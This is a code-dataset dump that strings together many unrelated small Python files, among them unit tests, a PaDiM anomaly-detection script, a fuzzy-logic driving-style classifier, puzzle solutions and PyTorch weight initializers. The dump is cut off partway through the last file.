content
stringlengths 0
894k
| type
stringclasses 2
values |
---|---|
from datetime import datetime, date, timezone
import dateutil
from dateutil.relativedelta import relativedelta
import re
from .util import calculate_price, DELIM_VALUE_REGEX, DOT_VALUE_REGEX
from isodate import parse_duration, parse_datetime
import pytz
def create_default_context(numeric, responseMetadata):
def cff_yeardiff(datestr1, datestr2):
if type(datestr1) is not str or type(datestr2) is not str:
return 0
d1 = datetime.strptime(datestr1, "%Y-%m-%d")
d2 = datetime.strptime(datestr2, "%Y-%m-%d")
return relativedelta(d1, d2).years
def cff_nthOfNextMonth(datestr, n, maxDayDiff=None):
"""Returns nth day of the next month after datestr.
If the return date is less than maxDayDiff away from date, then go to the next month.
"""
if type(datestr) is not str or type(n) is not int or n <= 0:
return None
date = datetime.strptime(datestr, "%Y-%m-%d")
new_date = (date + relativedelta(months=1)).replace(day=n)
if maxDayDiff and (new_date - date).days < maxDayDiff:
new_date = new_date + relativedelta(months=1)
return new_date.strftime("%Y-%m-%d")
# def cff_countArray(array, expression):
# return len([item for item in array if calculate_price(expression, item)])
def cff_countArray(*args):
# TODO: fix py-expression-eval so that the method signature above is called.
# Same applies to cff_addDuration.
array = list(args)
expression = array.pop(-1)
if type(array) is not list:
return 0
return len(
[
item
for item in array
if calculate_price(expression, item, numeric, responseMetadata)
]
)
def cff_today():
return date.today().strftime("%Y-%m-%d")
def cff_addDuration(dt, duration):
if type(dt) is not str:
return None
dt = datetime.strptime(dt, "%Y-%m-%d")
duration = parse_duration(duration)
new_time = dt + relativedelta(
months=int(getattr(duration, "months", 0)),
days=int(getattr(duration, "days", 0)),
years=int(getattr(duration, "years", 0)),
)
return new_time.strftime("%Y-%m-%d")
def cff_createdBetween(datestr1, datestr2):
if type(datestr1) is not str or type(datestr2) is not str:
return 0
datestr1 = re.sub(
DOT_VALUE_REGEX, ".", re.sub(DELIM_VALUE_REGEX, ":", datestr1)
)
datestr2 = re.sub(
DOT_VALUE_REGEX, ".", re.sub(DELIM_VALUE_REGEX, ":", datestr2)
)
d1 = parse_datetime(datestr1)
d2 = parse_datetime(datestr2)
date_created = responseMetadata.get("date_created", None)
date_created = (
parse_datetime(date_created) if date_created is not None else datetime.now()
)
# Convert date_created from a naive to an aware datetime,
# so that it can be compared with the naive datetimems d1 and d2.
# PyMongo always stores naive datetimes in UTC, so this is ok.
date_created = date_created.replace(tzinfo=pytz.utc)
return (date_created >= d1) and (date_created <= d2)
DEFAULT_CONTEXT = {
"cff_yeardiff": cff_yeardiff,
"cff_nthOfNextMonth": cff_nthOfNextMonth,
"cff_countArray": cff_countArray,
"cff_addDuration": cff_addDuration,
"cff_today": cff_today,
"cff_createdBetween": cff_createdBetween,
}
return DEFAULT_CONTEXT
| python |
import container_crawler.utils
import mock
import unittest
class TestUtils(unittest.TestCase):
@mock.patch('container_crawler.utils.InternalClient')
@mock.patch('container_crawler.utils.os')
def test_internal_client_path(self, os_mock, ic_mock):
os_mock.path.exists.return_value = True
os_mock.path.join.side_effect = lambda *x: '/'.join(x)
conf = {'internal_client_logname': 'TestClient',
'internal_client_path': '/etc/swift/internal-client.conf'}
container_crawler.utils.create_internal_client(conf, '/etc/swift')
ic_mock.assert_called_once_with(conf['internal_client_path'],
conf['internal_client_logname'], 3)
@mock.patch('container_crawler.utils.ConfigString')
@mock.patch('container_crawler.utils.InternalClient')
@mock.patch('container_crawler.utils.os')
def test_internal_client_path_not_found(self, os_mock, ic_mock, conf_mock):
os_mock.path.exists.return_value = False
os_mock.path.join.side_effect = lambda *x: '/'.join(x)
conf_string = mock.Mock()
conf_mock.return_value = conf_string
conf = {'internal_client_logname': 'TestClient',
'internal_client_path': '/etc/swift/internal-client.conf'}
container_crawler.utils.create_internal_client(conf, '/etc/swift')
os_mock.path.exists.assert_called_once_with(
conf['internal_client_path'])
conf_mock.assert_called_once_with(
container_crawler.utils.INTERNAL_CLIENT_CONFIG)
ic_mock.assert_called_once_with(
conf_string, conf['internal_client_logname'], 3)
| python |
import random
from random import sample
import argparse
import numpy as np
import os
import pickle
from tqdm import tqdm
from collections import OrderedDict
from sklearn.metrics import roc_auc_score
from sklearn.metrics import roc_curve
from sklearn.metrics import precision_recall_curve
from sklearn.covariance import LedoitWolf
from scipy.spatial.distance import mahalanobis
from scipy.ndimage import gaussian_filter
from skimage import morphology
from skimage.segmentation import mark_boundaries
import matplotlib.pyplot as plt
import matplotlib
import torch
import torch.nn.functional as F
from torch.utils.data import DataLoader
from torchvision.models import wide_resnet50_2, resnet18
import datasets.mvtec as mvtec
# device setup
use_cuda = torch.cuda.is_available()
device = torch.device('cuda' if use_cuda else 'cpu')
def parse_args():
parser = argparse.ArgumentParser('PaDiM')
parser.add_argument('--data_path', type=str, default='./datasets')
parser.add_argument('--save_path', type=str, default='./fundus_result')
parser.add_argument('--arch', type=str, choices=['resnet18', 'wide_resnet50_2'], default='resnet18')
return parser.parse_args()
_layer1 = 'layer2'
_layer2 = 'layer3'
_layer3 = 'layer3'
def main():
args = parse_args()
# load model
if args.arch == 'resnet18':
model = resnet18(pretrained=True, progress=True)
t_d = 384
d = 100
elif args.arch == 'wide_resnet50_2':
model = wide_resnet50_2(pretrained=True, progress=True)
t_d = 1792
d = 550
model.to(device)
model.eval()
random.seed(1024)
torch.manual_seed(1024)
if use_cuda:
torch.cuda.manual_seed_all(1024)
idx = torch.tensor(sample(range(0, t_d), d))
# print(f'--> {idx.shape}')
# set model's intermediate outputs
outputs = []
def hook(module, input, output):
outputs.append(output)
model.layer2[-1].register_forward_hook(hook)
model.layer3[-1].register_forward_hook(hook)
# model.layer3[-1].register_forward_hook(hook)
os.makedirs(os.path.join(args.save_path, 'temp_%s' % args.arch), exist_ok=True)
fig, ax = plt.subplots(1, 2, figsize=(20, 10))
fig_img_rocauc = ax[0]
fig_pixel_rocauc = ax[1]
total_roc_auc = []
total_pixel_roc_auc = []
for class_name in mvtec.CLASS_NAMES:
train_dataset = mvtec.MVTecDataset(args.data_path, class_name=class_name, is_train=True)
train_dataloader = DataLoader(train_dataset, batch_size=32, pin_memory=True)
test_dataset = mvtec.MVTecDataset(args.data_path, class_name=class_name, is_train=False)
test_dataloader = DataLoader(test_dataset, batch_size=32, pin_memory=True)
train_outputs = OrderedDict([(_layer1, []), (_layer2, [])])
test_outputs = OrderedDict([(_layer1, []), (_layer2, [])])
# train_outputs = OrderedDict([('layer2', []), ('layer3', []), ('layer4', [])])
# test_outputs = OrderedDict([('layer2', []), ('layer3', []), ('layer4', [])])
# extract train set features
train_feature_filepath = os.path.join(args.save_path, 'temp_%s' % args.arch, 'train_%s.pkl' % class_name)
if not os.path.exists(train_feature_filepath):
for (x, _, _) in tqdm(train_dataloader, '| feature extraction | train | %s |' % class_name):
# model prediction
with torch.no_grad():
_ = model(x.to(device))
# get intermediate layer outputs
for k, v in zip(train_outputs.keys(), outputs):
train_outputs[k].append(v.cpu().detach())
# initialize hook outputs
outputs = []
for k, v in train_outputs.items():
train_outputs[k] = torch.cat(v, 0)
# Embedding concat
embedding_vectors = train_outputs[_layer1]
for layer_name in [_layer2]:
embedding_vectors = embedding_concat(embedding_vectors, train_outputs[layer_name])
print(f'--> {embedding_vectors.shape}')
# randomly select d dimension
embedding_vectors = torch.index_select(embedding_vectors, 1, idx)
# calculate multivariate Gaussian distribution
B, C, H, W = embedding_vectors.size()
embedding_vectors = embedding_vectors.view(B, C, H * W)
mean = torch.mean(embedding_vectors, dim=0).numpy()
cov = torch.zeros(C, C, H * W).numpy()
I = np.identity(C)
for i in range(H * W):
# cov[:, :, i] = LedoitWolf().fit(embedding_vectors[:, :, i].numpy()).covariance_
cov[:, :, i] = np.cov(embedding_vectors[:, :, i].numpy(), rowvar=False) + 0.01 * I
# save learned distribution
train_outputs = [mean, cov]
with open(train_feature_filepath, 'wb') as f:
pickle.dump(train_outputs, f)
else:
print('load train set feature from: %s' % train_feature_filepath)
with open(train_feature_filepath, 'rb') as f:
train_outputs = pickle.load(f)
gt_list = []
gt_mask_list = []
test_imgs = []
# extract test set features
for (x, y, mask) in tqdm(test_dataloader, '| feature extraction | test | %s |' % class_name):
test_imgs.extend(x.cpu().detach().numpy())
gt_list.extend(y.cpu().detach().numpy())
gt_mask_list.extend(mask.cpu().detach().numpy())
# model prediction
with torch.no_grad():
_ = model(x.to(device))
# get intermediate layer outputs
for k, v in zip(test_outputs.keys(), outputs):
test_outputs[k].append(v.cpu().detach())
# initialize hook outputs
outputs = []
for k, v in test_outputs.items():
test_outputs[k] = torch.cat(v, 0)
# Embedding concat
embedding_vectors = test_outputs[_layer1]
for layer_name in [_layer2]:
embedding_vectors = embedding_concat(embedding_vectors, test_outputs[layer_name])
# randomly select d dimension
embedding_vectors = torch.index_select(embedding_vectors, 1, idx)
# calculate distance matrix
B, C, H, W = embedding_vectors.size()
embedding_vectors = embedding_vectors.view(B, C, H * W).numpy()
dist_list = []
for i in range(H * W):
mean = train_outputs[0][:, i]
conv_inv = np.linalg.inv(train_outputs[1][:, :, i])
dist = [mahalanobis(sample[:, i], mean, conv_inv) for sample in embedding_vectors]
dist_list.append(dist)
dist_list = np.array(dist_list).transpose(1, 0).reshape(B, H, W)
# upsample
dist_list = torch.tensor(dist_list)
score_map = F.interpolate(dist_list.unsqueeze(1), size=x.size(2), mode='bilinear',
align_corners=False).squeeze().numpy()
# apply gaussian smoothing on the score map
for i in range(score_map.shape[0]):
score_map[i] = gaussian_filter(score_map[i], sigma=4)
# Normalization
max_score = score_map.max()
min_score = score_map.min()
scores = (score_map - min_score) / (max_score - min_score)
# calculate image-level ROC AUC score
img_scores = scores.reshape(scores.shape[0], -1).max(axis=1)
gt_list = np.asarray(gt_list)
fpr, tpr, _ = roc_curve(gt_list, img_scores)
img_roc_auc = roc_auc_score(gt_list, img_scores)
total_roc_auc.append(img_roc_auc)
print('image ROCAUC: %.3f' % (img_roc_auc))
fig_img_rocauc.plot(fpr, tpr, label='%s img_ROCAUC: %.3f' % (class_name, img_roc_auc))
# get optimal threshold
gt_mask = np.asarray(gt_mask_list)
precision, recall, thresholds = precision_recall_curve(gt_mask.flatten(), scores.flatten())
a = 2 * precision * recall
b = precision + recall
f1 = np.divide(a, b, out=np.zeros_like(a), where=b != 0)
threshold = thresholds[np.argmax(f1)]
# # calculate per-pixel level ROCAUC
# fpr, tpr, _ = roc_curve(gt_mask.flatten(), scores.flatten())
# per_pixel_rocauc = roc_auc_score(gt_mask.flatten(), scores.flatten())
# total_pixel_roc_auc.append(per_pixel_rocauc)
# print('pixel ROCAUC: %.3f' % (per_pixel_rocauc))
# fig_pixel_rocauc.plot(fpr, tpr, label='%s ROCAUC: %.3f' % (class_name, per_pixel_rocauc))
save_dir = args.save_path + '/' + f'pictures_{args.arch}'
os.makedirs(save_dir, exist_ok=True)
plot_fig(test_imgs, scores, gt_mask_list, threshold, save_dir, class_name)
print('Average ROCAUC: %.3f' % np.mean(total_roc_auc))
fig_img_rocauc.title.set_text('Average image ROCAUC: %.3f' % np.mean(total_roc_auc))
fig_img_rocauc.legend(loc="lower right")
# print('Average pixel ROCUAC: %.3f' % np.mean(total_pixel_roc_auc))
# fig_pixel_rocauc.title.set_text('Average pixel ROCAUC: %.3f' % np.mean(total_pixel_roc_auc))
# fig_pixel_rocauc.legend(loc="lower right")
fig.tight_layout()
fig.savefig(os.path.join(args.save_path, 'roc_curve.png'), dpi=100)
def plot_fig(test_img, scores, gts, threshold, save_dir, class_name):
num = len(scores)
vmax = scores.max() * 255.
vmin = scores.min() * 255.
for i in range(num):
img = test_img[i]
img = denormalization(img)
# gt = gts[i].transpose(1, 2, 0).squeeze()
heat_map = scores[i] * 255
mask = scores[i]
mask[mask > threshold] = 1
mask[mask <= threshold] = 0
kernel = morphology.disk(4)
mask = morphology.opening(mask, kernel)
mask *= 255
vis_img = mark_boundaries(img, mask, color=(1, 0, 0), mode='thick')
fig_img, ax_img = plt.subplots(1, 5, figsize=(12, 3))
fig_img.subplots_adjust(right=0.9)
norm = matplotlib.colors.Normalize(vmin=vmin, vmax=vmax)
for ax_i in ax_img:
ax_i.axes.xaxis.set_visible(False)
ax_i.axes.yaxis.set_visible(False)
ax_img[0].imshow(img)
ax_img[0].title.set_text('Image')
# ax_img[1].imshow(gt, cmap='gray')
ax_img[1].title.set_text('GroundTruth')
ax = ax_img[2].imshow(heat_map, cmap='jet', norm=norm)
ax_img[2].imshow(img, cmap='gray', interpolation='none')
ax_img[2].imshow(heat_map, cmap='jet', alpha=0.5, interpolation='none')
ax_img[2].title.set_text('Predicted heat map')
ax_img[3].imshow(mask, cmap='gray')
ax_img[3].title.set_text('Predicted mask')
ax_img[4].imshow(vis_img)
ax_img[4].title.set_text('Segmentation result')
left = 0.92
bottom = 0.15
width = 0.015
height = 1 - 2 * bottom
rect = [left, bottom, width, height]
cbar_ax = fig_img.add_axes(rect)
cb = plt.colorbar(ax, shrink=0.6, cax=cbar_ax, fraction=0.046)
cb.ax.tick_params(labelsize=8)
font = {
'family': 'serif',
'color': 'black',
'weight': 'normal',
'size': 8,
}
cb.set_label('Anomaly Score', fontdict=font)
fig_img.savefig(os.path.join(save_dir, class_name + '_{}'.format(i)), dpi=100)
plt.close()
def denormalization(x):
mean = np.array([0.485, 0.456, 0.406])
std = np.array([0.229, 0.224, 0.225])
x = (((x.transpose(1, 2, 0) * std) + mean) * 255.).astype(np.uint8)
return x
def embedding_concat(x, y):
B, C1, H1, W1 = x.size()
_, C2, H2, W2 = y.size()
s = int(H1 / H2)
x = F.unfold(x, kernel_size=s, dilation=1, stride=s)
x = x.view(B, C1, -1, H2, W2)
z = torch.zeros(B, C1 + C2, x.size(2), H2, W2)
for i in range(x.size(2)):
z[:, :, i, :, :] = torch.cat((x[:, :, i, :, :], y), 1)
z = z.view(B, -1, H2 * W2)
z = F.fold(z, kernel_size=s, output_size=(H1, W1), stride=s)
return z
if __name__ == '__main__':
main()
| python |
"""
A QUANTIDADE DE UMA LETRA, A PRIMEIRA E A ÚLTIMA VEZ QUE APARECERAM NA FRASE!
"""
frase = str(input('Digite uma frase: ')).strip()
frase = frase.upper()
print('A quantidade de A é {} '.format(frase.count('A')))
print('A primeira vez que A apareceu foi: {} '.format(frase.find('A')+1))
print('A última vez que A apareceu foi: {} '.format(frase.rfind('A')+1))
'''
dividido = frase.split()
print(dividido)]
print(''.format(dividido[].count(['a'])))
'''
| python |
ll=range(5, 20, 5)
for i in ll:
print(i)
print (ll)
x = 'Python'
for i in range(len(x)) :
print(x[i]) | python |
from typing import Sequence, Union
from PIL import Image
class BaseTransform:
"""
Generic image transform type class
"""
slug: Union[None, str] = None # unique string that identifies a given transform
@staticmethod
def apply_transform(
img: Image.Image, parameters: Sequence[Union[str, int]]
) -> Image.Image:
raise NotImplementedError
@staticmethod
def derive_parameters(query: str) -> Sequence[Union[str, int]]:
raise NotImplementedError
| python |
from collections import Counter
input_data = open("day12.input").read().split("\n")
input_data = [tuple(a.split("-")) for a in input_data]
connections = []
for (a, b) in input_data:
if a != 'start':
connections.append((b, a))
connections += input_data
connections.sort()
def part1(path, b):
return b not in path
def part2(path, b):
count = Counter(path + [b])
lower2 = 0
for key in count.keys():
if key in ['start', 'end'] and count[key] > 1:
return False
if key.islower() and count[key] > 1:
if count[key] < 3:
lower2 += 1
else:
return False
return lower2 <= 1
start_paths = [['start']]
end_paths = []
while True:
new_paths = []
for path in start_paths:
for (a, b) in connections:
if path[-1] == a and b == 'end':
end_paths.append(path + [b])
elif path[-1] == a and (b.isupper() or part2(path, b)):
new_paths.append(path + [b])
if len(new_paths) > 0:
start_paths = new_paths
else:
break
print('Result')
for path in end_paths:
print(path)
print(len(end_paths))
| python |
import os
import numpy as np
import pandas as pd
from typing import Any, Dict, List, Optional, Tuple, NoReturn
import skfuzzy as fuzz
import skfuzzy.control as ctrl
from aggregation import OWA_T1
import matplotlib.pyplot as plt
class FLST1Model(object):
def __init__(self, rules_path:str, expert_mode:str):
self.antecedent = {}
self.consequent = {}
self.expert_mode = expert_mode
self.build_model()
self.system = self.build_rules(rules_dir=rules_path)
self.fuzz_inf = ctrl.ControlSystemSimulation(self.system,
flush_after_run=10)
def build_model(self)->NoReturn:
# ANTECENDENT
self.antecedent = {}
### Acceleration
self.antecedent['Acceleration'] = ctrl.Antecedent(universe=np.linspace(0,10, 11),
label='Acceleration')
self.antecedent['Acceleration']['small'] = \
fuzz.trapmf(self.antecedent['Acceleration'].universe, [0., 0., 3., 4.])
self.antecedent['Acceleration']['medium'] = \
fuzz.trapmf(self.antecedent['Acceleration'].universe, [3., 4., 6., 7.])
self.antecedent['Acceleration']['large'] = \
fuzz.trapmf(self.antecedent['Acceleration'].universe, [6., 7., 10., 10.])
### Deceleration
self.antecedent['Deceleration'] = ctrl.Antecedent(universe=np.linspace(0,10, 11),
label='Deceleration')
self.antecedent['Deceleration']['small'] = \
fuzz.trapmf(self.antecedent['Deceleration'].universe, [0., 0., 3., 4.])
self.antecedent['Deceleration']['medium'] = \
fuzz.trapmf(self.antecedent['Deceleration'].universe, [3., 4., 6., 7.])
self.antecedent['Deceleration']['large'] = \
fuzz.trapmf(self.antecedent['Deceleration'].universe, [6., 7., 10., 10.])
### Lateral Jerk
self.antecedent['LateralJerk'] = ctrl.Antecedent(universe=np.linspace(0,16, 17),
label='LateralJerk')
self.antecedent['LateralJerk']['small'] = \
fuzz.trapmf(self.antecedent['LateralJerk'].universe, [0., 0., 4., 6.])
self.antecedent['LateralJerk']['medium'] = \
fuzz.trapmf(self.antecedent['LateralJerk'].universe, [4., 6., 10., 12.])
self.antecedent['LateralJerk']['large'] = \
fuzz.trapmf(self.antecedent['LateralJerk'].universe, [10., 12., 16., 16.])
### Velocity
self.antecedent['Velocity'] = ctrl.Antecedent(universe=np.linspace(0,100, 101),
label='Velocity')
self.antecedent['Velocity']['very_slow'] = fuzz.trapmf(
self.antecedent['Velocity'].universe, [0., 0., 15., 20.])
self.antecedent['Velocity']['slow'] = fuzz.trapmf(
self.antecedent['Velocity'].universe, [15., 20., 30., 35.])
self.antecedent['Velocity']['normal'] = fuzz.trapmf(
self.antecedent['Velocity'].universe, [30., 35., 50., 55.])
self.antecedent['Velocity']['fast'] = fuzz.trapmf(
self.antecedent['Velocity'].universe, [50., 55., 70., 75.])
self.antecedent['Velocity']['very_fast'] = fuzz.trapmf(
self.antecedent['Velocity'].universe, [70., 75., 100., 100.])
# CONSEQUENT
### Behavior (Driving Style)
self.consequent['Behavior'] = ctrl.Consequent(universe=np.linspace(0,1., 11),
label='Behavior')
self.consequent['Behavior']['calm'] = fuzz.trapmf(self.consequent['Behavior'].universe,
[0., 0., 0.2, 0.4])
self.consequent['Behavior']['moderate'] = fuzz.trapmf(self.consequent['Behavior'].universe,
[0.2, 0.4, 0.6, 0.8])
self.consequent['Behavior']['aggressive'] = fuzz.trapmf(self.consequent['Behavior'].universe,
[0.6, 0.8, 1., 1.])
def build_rules(self, rules_dir:str)->ctrl.ControlSystem:
assert os.path.exists(rules_dir),\
('[Fuzzy Logic System T1 model][build_rules][ERROR]'
' rules_dir not found!{}').format(rules_dir)
rules_files = os.listdir(rules_dir)
rules = None
if self.expert_mode=='single':
rules_files[0] = 'rules_0.csv'
print('[Fuzzy Logic System T1 mode][build rules]', end='')
print(f' single expert system! (rule:{rules_files[0]})')
rules = self._single_expert_rules(os.path.join(rules_dir, rules_files[0]))
elif self.expert_mode=='multiple':
print('[Fuzzy Logic System - T1][build_rules]', end='')
print(f' multiple expert system: (n_e: {len(rules_files)})')
rules = self._multiple_expert_rules(rules_files, root_dir=rules_dir)
else:
assert False,\
('[Fuzzy Logic System T1 model][build_rules][ERROR]'
' expert_mode invalid! {}').format(self.expert_mode)
assert rules is not None,\
('[Fuzzy Logic System T1 model][build_rules][ERROR]'
' error while building rules..')
system = ctrl.ControlSystem(rules=rules)
return system
def _single_expert_rules(self, rule_file:str)->List:
rules = pd.read_csv(rule_file)
assert rules.shape[1] == 5,\
('[Fuzzy Logic System T1 model][build_rules] wrong rule_file shape'
'{} != (m, 5)'.format(rules.shape))
domain = {'calm':'calm',
'more_calm_than_moderate':'calm',
'between_calm_and_moderate':'moderate',
'more_moderate_than_calm':'moderate',
'moderate':'moderate',
'more_moderate_than_aggressive':'moderate',
'between_moderate_and_aggressive':'aggressive',
'more_aggressive_than_moderate':'aggressive',
'aggressive':'aggressive'}
#self._check_rules(rules=rules)
fuzz_rules = []
for line in rules.iterrows():
index, r = line[0], line[1]
xs = domain[r['driving_style']]
fr = ctrl.Rule(antecedent=(self.antecedent['Velocity'][r['velocity']] &\
self.antecedent['Acceleration'][r['acceleration']] &\
self.antecedent['Deceleration'][r['deceleration']] &\
self.antecedent['LateralJerk'][r['lateral_jerk']]),
consequent=self.consequent['Behavior'][xs],
label=f'rule - {index}')
fuzz_rules.append(fr)
return fuzz_rules
def _multiple_expert_function(self, label:str)->float:
domain = {'calm':1,
'more_calm_than_moderate':2,
'between_calm_and_moderate':3,
'more_moderate_than_calm':4,
'moderate':5,
'more_moderate_than_aggressive':6,
'between_moderate_and_aggressive':7,
'more_aggressive_than_moderate':8,
'aggressive':9}
return (1./9.)*domain[label]
def _multiple_expert_rules(self, rules_files:List[str], root_dir:str)->NoReturn:
rules = None
#get rules
decisions = []
for rule_file in rules_files:
_file = pd.read_csv(os.path.join(root_dir,rule_file))
decisions.append(_file['driving_style'].values)
rules = _file[['velocity', 'acceleration', 'deceleration', 'lateral_jerk']]
decisions = np.asarray(decisions).T
#aggregate decisions
y = []
for d in decisions:
#print(d, end="")
xs = np.array([self._multiple_expert_function(label=l) for l in d])
value = OWA_T1(X=xs,kind=2)
memb_value, set_labels = self._fuzz_driving_style(value=value)
y.append(set_labels[np.argmax(memb_value)])
#print(y[-1])
#create rules
fuzz_rules = []
for line, _y in zip(rules.iterrows(), y):
index, r = line[0], line[1]
fr = ctrl.Rule(antecedent=(self.antecedent['Velocity'][r['velocity']] &\
self.antecedent['Acceleration'][r['acceleration']] &\
self.antecedent['Deceleration'][r['deceleration']] &\
self.antecedent['LateralJerk'][r['lateral_jerk']]),
consequent=self.consequent['Behavior'][_y],
label=f'rule - {index}')
fuzz_rules.append(fr)
return fuzz_rules
def _fuzz_driving_style(self,value:float)->Tuple:
memb_value = []
set_labels = []
for label, term in self.consequent['Behavior'].terms.items():
mi =fuzz.interp_membership(self.consequent['Behavior'].universe,
term.mf,
value)
memb_value.append(mi)
set_labels.append(label)
return memb_value, set_labels
def inference(self, observation:Dict) -> Dict:
"""
perform inference at the fuzzy system
"""
vel = observation['velocity']*3.6 #m/s -> Km/h
acc = observation['acceleration'] #m/s^2
dec = observation['deceleration'] #m/s^2
ljk = observation['lateral_jerk'] #std (m/s^3)
self.fuzz_inf.input['Acceleration'] = acc
self.fuzz_inf.input['Deceleration'] = dec
self.fuzz_inf.input['LateralJerk'] = ljk
self.fuzz_inf.input['Velocity'] = vel
self.fuzz_inf.compute()
y = self.fuzz_inf.output['Behavior']
memb_value, set_labels = self._fuzz_driving_style(value=y)
result = {}
result['value'] = y
result['membership_values'] = np.asarray(memb_value)
result['set_labels']=set_labels
return result
def plot(self)-> NoReturn:
self.antecedent['Acceleration'].view()
self.antecedent['Deceleration'].view()
self.antecedent['Velocity'].view()
self.consequent['Behavior'].view()
plt.show()
| python |
from distutils.core import setup
from Cython.Build import cythonize
setup(ext_modules = cythonize('fasterloop.pyx'))
| python |
#!/usr/bin/env python3
# -*- coding:utf-8 -*-
from enum import Enum, unique
@unique
class AnalyzeFieldIdx(Enum):
IDX_MODULE_NAME = 0
IDX_ANALYE_NAME = 1
IDX_COLUMN_INFO = 2
IDX_IS_EXECUTE = 3
| python |
import unittest
from . import day01
class TestDay1(unittest.TestCase):
def test_basic(self):
self.assertEqual('hello', 'hello')
def test_fuel_is_calculated_correctly_for_given_examples(self):
self.assertEqual(day01.get_fuel_required(module_mass=12), 2)
self.assertEqual(day01.get_fuel_required(module_mass=14), 2)
self.assertEqual(day01.get_fuel_required(module_mass=1969), 654)
self.assertEqual(day01.get_fuel_required(module_mass=100756), 33583)
def test_fuel_for_fuel_is_calculated_correctly_for_given_examples(self):
self.assertEqual(day01.get_fuel_required_for_fuel(fuel_volume=2), 0)
self.assertEqual(day01.get_fuel_required_for_fuel(fuel_volume=654), 966-654)
self.assertEqual(day01.get_fuel_required_for_fuel(fuel_volume=33583), 50346-33583)
if __name__ == "__main__":
unittest.main() | python |
# Code by JohnXdator
n,k = map(int,input().split())
ups = list(map(int,input().split()))
count = 0
for i in range(n):
if ups[k-1] == 0 and ups[i] == ups[k-1]:
count>=count+0
elif ups[k-1] <= ups[i]:
count=count+1
else:
count=count+0
print(count)
| python |
from django.test import TestCase
from django.core.management import call_command
class TestUi(TestCase):
def setUp(self):
call_command('loaddata', 'user', verbosity=0)
call_command('loaddata', 'init', verbosity=0)
call_command('loaddata', 'test/testWorld', verbosity=0)
def test_ui(self):
response = self.client.post('/ui/login/', {'username': 'admin', 'password': 'admin1379'})
self.assertEqual(response.status_code, 200)
def test_wrong_pwd(self):
response = self.client.post('/ui/login/', {'username': 'admin', 'password': 'admin137xxx'})
self.assertEqual(response.status_code, 401)
def test_bad_user(self):
response = self.client.post('/ui/login/', {'username': 'adminxxx', 'password': 'admin1379'})
self.assertEqual(response.status_code, 401) | python |
import math
import warnings
from torch import Tensor
import torch.nn as nn
def zeros_():
"""Return the initializer filling the input Tensor with the scalar zeros"""
def initializer(tensor: Tensor, fan_in: int = None, fan_out: int = None):
return nn.init.zeros_(tensor)
return initializer
def ones_():
"""Return the initializer filling the input Tensor with the scalar ones"""
def initializer(tensor: Tensor, fan_in: int = None, fan_out: int = None):
return nn.init.ones_(tensor)
return initializer
def uniform_(a: float = 0., b: float = 1.):
r"""Return the initializer filling the input Tensor with values drawn from the uniform
distribution :math:`\mathcal{U}(a, b)`.
Args:
a (float): the lower bound of the uniform distribution. Defaults 0.0.
b (float): the upper bound of the uniform distribution. Defaults 1.0.
"""
def initializer(tensor: Tensor, fan_in: int = None, fan_out: int = None):
return nn.init.uniform_(tensor, a, b)
return initializer
def normal_(mean: float = 0., std: float = 1.):
r"""Return the initializer filling the input Tensor with values drawn from the normal distribution
.. math::
\mathcal{N}(\text{mean}, \text{std}^2)
Args:
mean (float): the mean of the normal distribution. Defaults 0.0.
std (float): the standard deviation of the normal distribution. Defaults 1.0.
"""
def initializer(tensor: Tensor, fan_in: int = None, fan_out: int = None):
return nn.init.normal_(tensor, mean, std)
return initializer
def trunc_normal_(mean: float = 0., std: float = 1., a: float = -2., b: float = 2.):
r"""Return the initializer filling the input Tensor with values drawn from a truncated
normal distribution. The values are effectively drawn from the
normal distribution :math:`\mathcal{N}(\text{mean}, \text{std}^2)`
with values outside :math:`[a, b]` redrawn until they are within
the bounds. The method used for generating the random values works
best when :math:`a \leq \text{mean} \leq b`.
Args:
mean (float): the mean of the normal distribution. Defaults 0.0.
std (float): the standard deviation of the normal distribution. Defaults 1.0.
a (float): the minimum cutoff value. Defaults -2.0.
b (float): the maximum cutoff value. Defaults 2.0.
"""
def initializer(tensor: Tensor, fan_in: int = None, fan_out: int = None):
return nn.init.trunc_normal_(tensor, mean, std, a, b)
return initializer
def kaiming_uniform_(a=0, mode='fan_in', nonlinearity='leaky_relu'):
r"""Return the initializer filling the input `Tensor` with values according to the method
described in `Delving deep into rectifiers: Surpassing human-level
performance on ImageNet classification` - He, K. et al. (2015), using a
uniform distribution. The resulting tensor will have values sampled from
:math:`\mathcal{U}(-\text{bound}, \text{bound})` where
.. math::
\text{bound} = \text{gain} \times \sqrt{\frac{3}{\text{fan_mode}}}
Also known as 'He initialization'.
Args:
a (int): the negative slope of the rectifier used after this layer (only used with ``'leaky_relu'``).
mode (str, optional): either ``'fan_in'`` (default) or ``'fan_out'``. Choosing ``'fan_in'``
preserves the magnitude of the variance of the weights in the
forward pass. Choosing ``'fan_out'`` preserves the magnitudes in the
backwards pass.
nonlinearity (str, optional): the non-linear function (`nn.functional` name),
recommended to use only with ``'relu'`` or ``'leaky_relu'`` (default).
"""
# adapted from torch.nn.init
def initializer(tensor: Tensor, fan_in: int = None, fan_out: int = None):
if 0 in tensor.shape:
warnings.warn("Initializing zero-element tensors is a no-op")
return tensor
if mode == 'fan_in':
assert fan_in is not None, 'Fan_in is not provided.'
fan = fan_in
elif mode == 'fan_out':
assert fan_out is not None, 'Fan_out is not provided.'
fan = fan_out
else:
raise ValueError(f'Invalid initialization mode \'{mode}\'')
std = nn.init.calculate_gain(nonlinearity, a) / math.sqrt(fan)
bound = math.sqrt(3.) * std
return nn.init.uniform_(tensor, -bound, bound)
return initializer
def kaiming_normal_(a=0, mode='fan_in', nonlinearity='leaky_relu'):
r"""Return the initializer filling the input `Tensor` with values according to the method
described in `Delving deep into rectifiers: Surpassing human-level
performance on ImageNet classification` - He, K. et al. (2015), using a
normal distribution. The resulting tensor will have values sampled from
:math:`\mathcal{N}(0, \text{std}^2)` where
.. math::
\text{std} = \frac{\text{gain}}{\sqrt{\text{fan_mode}}}
Also known as 'He initialization'.
Args:
a (int): the negative slope of the rectifier used after this layer (only used with ``'leaky_relu'``).
mode (str, optional): either ``'fan_in'`` (default) or ``'fan_out'``. Choosing ``'fan_in'``
preserves the magnitude of the variance of the weights in the
forward pass. Choosing ``'fan_out'`` preserves the magnitudes in the
backwards pass.
nonlinearity (str, optional): the non-linear function (`nn.functional` name),
recommended to use only with ``'relu'`` or ``'leaky_relu'`` (default).
"""
# adapted from torch.nn.init
def initializer(tensor: Tensor, fan_in: int = None, fan_out: int = None):
if 0 in tensor.shape:
warnings.warn("Initializing zero-element tensors is a no-op")
return tensor
if mode == 'fan_in':
assert fan_in is not None, 'Fan_in is not provided.'
fan = fan_in
elif mode == 'fan_out':
